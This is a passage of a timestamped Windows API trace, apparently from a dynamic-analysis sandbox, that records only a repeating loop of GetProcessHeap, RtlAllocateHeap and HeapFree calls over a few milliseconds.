[0061.034] GetProcessHeap () returned 0x4f10000 [0061.034] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0061.034] GetProcessHeap () returned 0x4f10000 [0061.034] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.034] GetProcessHeap () returned 0x4f10000 [0061.034] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0061.034] GetProcessHeap () returned 0x4f10000 [0061.034] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0061.034] GetProcessHeap () returned 0x4f10000 [0061.034] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.034] GetProcessHeap () returned 0x4f10000 [0061.034] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0061.034] GetProcessHeap () returned 0x4f10000 [0061.034] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0061.034] GetProcessHeap () returned 0x4f10000 [0061.034] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.034] GetProcessHeap () returned 0x4f10000 [0061.034] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0061.034] GetProcessHeap () returned 0x4f10000 [0061.034] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0061.034] GetProcessHeap () returned 0x4f10000 [0061.034] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.034] GetProcessHeap () returned 0x4f10000 [0061.034] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.034] GetProcessHeap () returned 0x4f10000 [0061.035] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0061.035] GetProcessHeap () returned 0x4f10000 [0061.035] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0061.035] GetProcessHeap () returned 0x4f10000 [0061.035] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.035] GetProcessHeap () returned 0x4f10000 [0061.035] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.035] GetProcessHeap () returned 0x4f10000 [0061.035] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0061.035] GetProcessHeap () returned 0x4f10000 [0061.035] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0061.035] GetProcessHeap () returned 0x4f10000 [0061.035] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.035] GetProcessHeap () returned 0x4f10000 [0061.035] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0061.035] GetProcessHeap () returned 0x4f10000 [0061.035] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0061.035] GetProcessHeap () returned 0x4f10000 [0061.035] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.035] GetProcessHeap () returned 0x4f10000 [0061.035] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0061.035] GetProcessHeap () returned 0x4f10000 [0061.035] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0061.035] GetProcessHeap () returned 0x4f10000 [0061.035] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.035] GetProcessHeap () returned 0x4f10000 [0061.035] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.035] GetProcessHeap () returned 0x4f10000 [0061.035] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0061.035] GetProcessHeap () returned 0x4f10000 [0061.035] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0061.035] GetProcessHeap () returned 0x4f10000 [0061.036] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.036] GetProcessHeap () returned 0x4f10000 [0061.036] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.036] GetProcessHeap () returned 0x4f10000 [0061.036] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0061.036] GetProcessHeap () returned 0x4f10000 [0061.036] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0061.036] GetProcessHeap () returned 0x4f10000 [0061.036] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.036] GetProcessHeap () returned 0x4f10000 [0061.036] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0061.036] GetProcessHeap () returned 0x4f10000 [0061.036] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0061.036] GetProcessHeap () returned 0x4f10000 [0061.036] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0061.036] GetProcessHeap () returned 0x4f10000 [0061.036] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0061.036] GetProcessHeap () returned 0x4f10000 [0061.036] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.036] GetProcessHeap () returned 0x4f10000 [0061.036] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0061.036] GetProcessHeap () returned 0x4f10000 [0061.036] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0061.036] GetProcessHeap () returned 0x4f10000 [0061.036] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.036] GetProcessHeap () returned 0x4f10000 [0061.036] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.036] GetProcessHeap () returned 0x4f10000 [0061.036] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0061.036] GetProcessHeap () returned 0x4f10000 [0061.036] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0061.036] GetProcessHeap () returned 0x4f10000 [0061.036] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.036] GetProcessHeap () returned 0x4f10000 [0061.036] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.036] GetProcessHeap () returned 0x4f10000 [0061.036] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0061.036] GetProcessHeap () returned 0x4f10000 [0061.037] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0061.037] GetProcessHeap () returned 0x4f10000 [0061.037] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.037] GetProcessHeap () returned 0x4f10000 [0061.037] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.037] GetProcessHeap () returned 0x4f10000 [0061.037] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0061.037] GetProcessHeap () returned 0x4f10000 [0061.037] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0061.037] GetProcessHeap () returned 0x4f10000 [0061.037] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.037] GetProcessHeap () returned 0x4f10000 [0061.037] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.037] GetProcessHeap () returned 0x4f10000 [0061.037] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0061.037] GetProcessHeap () returned 0x4f10000 [0061.037] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.037] GetProcessHeap () returned 0x4f10000 [0061.037] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.037] GetProcessHeap () returned 0x4f10000 [0061.037] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.037] GetProcessHeap () returned 0x4f10000 [0061.037] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.037] GetProcessHeap () returned 0x4f10000 [0061.037] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.037] GetProcessHeap () returned 0x4f10000 [0061.037] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.037] GetProcessHeap () returned 0x4f10000 [0061.037] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.037] GetProcessHeap () returned 0x4f10000 [0061.037] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.037] GetProcessHeap () returned 0x4f10000 [0061.037] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.037] GetProcessHeap () returned 0x4f10000 [0061.037] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.037] GetProcessHeap () returned 0x4f10000 [0061.037] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.038] GetProcessHeap () returned 0x4f10000 [0061.038] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.038] GetProcessHeap () returned 0x4f10000 [0061.038] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.038] GetProcessHeap () returned 0x4f10000 [0061.038] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.038] GetProcessHeap () returned 0x4f10000 [0061.038] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.038] GetProcessHeap () returned 0x4f10000 [0061.038] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.038] GetProcessHeap () returned 0x4f10000 [0061.038] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.038] GetProcessHeap () returned 0x4f10000 [0061.038] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.038] GetProcessHeap () returned 0x4f10000 [0061.038] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.038] GetProcessHeap () returned 0x4f10000 [0061.038] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.038] GetProcessHeap () returned 0x4f10000 [0061.038] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.038] GetProcessHeap () returned 0x4f10000 [0061.038] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.038] GetProcessHeap () returned 0x4f10000 [0061.038] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.038] GetProcessHeap () returned 0x4f10000 [0061.038] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.038] GetProcessHeap () returned 0x4f10000 [0061.038] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.038] GetProcessHeap () returned 0x4f10000 [0061.038] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.038] GetProcessHeap () returned 0x4f10000 [0061.038] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.038] GetProcessHeap () returned 0x4f10000 [0061.038] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.038] GetProcessHeap () returned 0x4f10000 [0061.038] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.038] GetProcessHeap () returned 0x4f10000 [0061.039] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.039] GetProcessHeap () returned 0x4f10000 [0061.039] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.039] GetProcessHeap () returned 0x4f10000 [0061.039] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.039] GetProcessHeap () returned 0x4f10000 [0061.039] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.039] GetProcessHeap () returned 0x4f10000 [0061.039] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.039] GetProcessHeap () returned 0x4f10000 [0061.039] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.039] GetProcessHeap () returned 0x4f10000 [0061.039] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.039] GetProcessHeap () returned 0x4f10000 [0061.039] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.039] GetProcessHeap () returned 0x4f10000 [0061.039] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.039] GetProcessHeap () returned 0x4f10000 [0061.039] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.039] GetProcessHeap () returned 0x4f10000 [0061.039] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.039] GetProcessHeap () returned 0x4f10000 [0061.039] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.039] GetProcessHeap () returned 0x4f10000 [0061.039] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.039] GetProcessHeap () returned 0x4f10000 [0061.039] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.039] GetProcessHeap () returned 0x4f10000 [0061.039] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.039] GetProcessHeap () returned 0x4f10000 [0061.039] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.039] GetProcessHeap () returned 0x4f10000 [0061.039] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.039] GetProcessHeap () returned 0x4f10000 [0061.039] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.039] GetProcessHeap () returned 0x4f10000 [0061.039] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.040] GetProcessHeap () returned 0x4f10000 [0061.040] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.040] GetProcessHeap () returned 0x4f10000 [0061.040] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.040] GetProcessHeap () returned 0x4f10000 [0061.040] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.040] GetProcessHeap () returned 0x4f10000 [0061.040] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.040] GetProcessHeap () returned 0x4f10000 [0061.040] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.040] GetProcessHeap () returned 0x4f10000 [0061.040] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.040] GetProcessHeap () returned 0x4f10000 [0061.040] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.040] GetProcessHeap () returned 0x4f10000 [0061.040] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.040] GetProcessHeap () returned 0x4f10000 [0061.040] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.040] GetProcessHeap () returned 0x4f10000 [0061.040] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.040] GetProcessHeap () returned 0x4f10000 [0061.040] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.040] GetProcessHeap () returned 0x4f10000 [0061.040] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.040] GetProcessHeap () returned 0x4f10000 [0061.040] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.040] GetProcessHeap () returned 0x4f10000 [0061.040] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.040] GetProcessHeap () returned 0x4f10000 [0061.040] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.040] GetProcessHeap () returned 0x4f10000 [0061.040] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.040] GetProcessHeap () returned 0x4f10000 [0061.040] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.040] GetProcessHeap () returned 0x4f10000 [0061.040] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.040] GetProcessHeap () returned 0x4f10000 [0061.041] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.041] GetProcessHeap () returned 0x4f10000 [0061.041] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.041] GetProcessHeap () returned 0x4f10000 [0061.041] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.041] GetProcessHeap () returned 0x4f10000 [0061.041] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.041] GetProcessHeap () returned 0x4f10000 [0061.041] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.041] GetProcessHeap () returned 0x4f10000 [0061.041] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.041] GetProcessHeap () returned 0x4f10000 [0061.041] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.041] GetProcessHeap () returned 0x4f10000 [0061.041] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.041] GetProcessHeap () returned 0x4f10000 [0061.041] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.041] GetProcessHeap () returned 0x4f10000 [0061.041] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.041] GetProcessHeap () returned 0x4f10000 [0061.041] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.041] GetProcessHeap () returned 0x4f10000 [0061.041] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.041] GetProcessHeap () returned 0x4f10000 [0061.041] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.041] GetProcessHeap () returned 0x4f10000 [0061.041] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.041] GetProcessHeap () returned 0x4f10000 [0061.041] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.041] GetProcessHeap () returned 0x4f10000 [0061.041] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.041] GetProcessHeap () returned 0x4f10000 [0061.041] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.041] GetProcessHeap () returned 0x4f10000 [0061.041] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.041] GetProcessHeap () returned 0x4f10000 [0061.041] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.041] GetProcessHeap () returned 0x4f10000 [0061.042] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.042] GetProcessHeap () returned 0x4f10000 [0061.042] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.042] GetProcessHeap () returned 0x4f10000 [0061.042] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.042] GetProcessHeap () returned 0x4f10000 [0061.042] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.042] GetProcessHeap () returned 0x4f10000 [0061.042] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.042] GetProcessHeap () returned 0x4f10000 [0061.042] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.042] GetProcessHeap () returned 0x4f10000 [0061.042] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.042] GetProcessHeap () returned 0x4f10000 [0061.042] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43da0 [0061.042] GetProcessHeap () returned 0x4f10000 [0061.042] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.042] GetProcessHeap () returned 0x4f10000 [0061.042] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.042] GetProcessHeap () returned 0x4f10000 [0061.042] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43da0 | out: hHeap=0x4f10000) returned 1 [0061.042] GetProcessHeap () returned 0x4f10000 [0061.042] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.042] GetProcessHeap () returned 0x4f10000 [0061.042] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.042] GetProcessHeap () returned 0x4f10000 [0061.042] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.042] GetProcessHeap () returned 0x4f10000 [0061.042] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.042] GetProcessHeap () returned 0x4f10000 [0061.042] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.042] GetProcessHeap () returned 0x4f10000 [0061.042] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.042] GetProcessHeap () returned 0x4f10000 [0061.042] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.042] GetProcessHeap () returned 0x4f10000 [0061.043] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.043] GetProcessHeap () returned 0x4f10000 [0061.043] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.043] GetProcessHeap () returned 0x4f10000 [0061.043] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.043] GetProcessHeap () returned 0x4f10000 [0061.043] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.043] GetProcessHeap () returned 0x4f10000 [0061.043] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.043] GetProcessHeap () returned 0x4f10000 [0061.043] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.043] GetProcessHeap () returned 0x4f10000 [0061.043] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.043] GetProcessHeap () returned 0x4f10000 [0061.043] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.043] GetProcessHeap () returned 0x4f10000 [0061.043] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.043] GetProcessHeap () returned 0x4f10000 [0061.043] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.043] GetProcessHeap () returned 0x4f10000 [0061.043] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f43ea8 | out: hHeap=0x4f10000) returned 1 [0061.043] GetProcessHeap () returned 0x4f10000 [0061.043] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f43ea8 [0061.043] GetProcessHeap () returned 0x4f10000 [0061.043] 